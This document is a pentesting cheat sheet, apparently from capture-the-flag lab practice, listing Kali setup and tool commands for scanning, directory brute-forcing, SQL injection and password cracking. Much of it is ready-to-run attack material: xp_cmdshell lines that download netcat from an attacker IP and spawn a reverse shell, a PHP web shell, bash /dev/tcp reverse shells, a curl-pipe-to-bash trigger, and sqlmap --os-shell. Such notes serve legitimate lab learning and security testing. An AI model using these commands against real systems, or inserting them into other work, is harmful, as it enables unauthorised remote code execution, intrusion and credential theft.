Pentesting tools and useful commands
GTFOBins — list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Default Kali apt source (rolling):
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list
More stable (last snapshot):
echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list
Install the large tool metapackage:
sudo apt install -y kali-linux-large
Install the GUI (Win-KeX, for Kali on WSL):
sudo apt install -y kali-win-kex
Run the GUI in window mode; to exit full-screen mode press F8:
kex --win -s
Wappalyzer — browser extension to see the technologies used on websites.
OpenVPN
sudo openvpn --config vpn.ovpn --daemon
The network interface can be checked by running the ifconfig command in the terminal.
Shut down the VPN interface:
sudo ifconfig tun1 down
Search for web directories and files on a site:
dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt
Responder
sudo responder -I tun0
John the Ripper
Extract the archive hash, then crack it with a wordlist (the output file from zip2john is the input file for john):
zip2john backup.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Identify possible hash types (the example value is a 32-hex-character MD5-style hash):
hashid 2cb42f8734ea607eefed3b70af13bbd3
Crack the hash with hashcat (-a 0 is dictionary mode, -m 0 is MD5):
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
Impacket MSSQL client
impacket-mssqlclient ARCHETYPE/sql_svc@<TARGET_IP> -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.17.81/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.17.81 443"
sqlmap
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell
Evil-WinRM
evil-winrm -i 10.129.233.177 -u administrator -p badminton
Nmap
sudo nmap -sV 192.168.1.1
sudo nmap -sV -sC 192.168.1.1
sudo nmap -p- --min-rate 5000 -sV 192.168.1.1
Gobuster
go install github.com/OJ/gobuster/v3@latest
git clone https://github.com/danielmiessler/SecLists.git
gobuster dir --url http://10.129.236.130/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url http://10.129.119.70/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
MySQL
mysql -h 10.129.132.32 -u root
SHOW databases; : Prints out the databases we can access.
USE {database_name}; : Switches to the database named {database_name}.
SHOW tables; : Prints out the available tables inside the current database.
SELECT * FROM {table_name}; : Prints out all the data from the table {table_name}.
SMB
smbclient -N -L \\\\{TARGET_IP}\\
-N : No password (null session)
-L : List the shares and services available on the server
Simple PHP Shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Reverse Shell
printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' > shell.sh
Or
bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"
Start a netcat listener:
nc -nvlp 1337
Start a web server to host shell.sh:
python3 -m http.server 8000
Trigger the reverse shell through the PHP web shell (fetch shell.sh and pipe it to bash):
http://thetoppers.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash
Spawn an interactive TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Alternative shell upgrade:
script /dev/null -c bash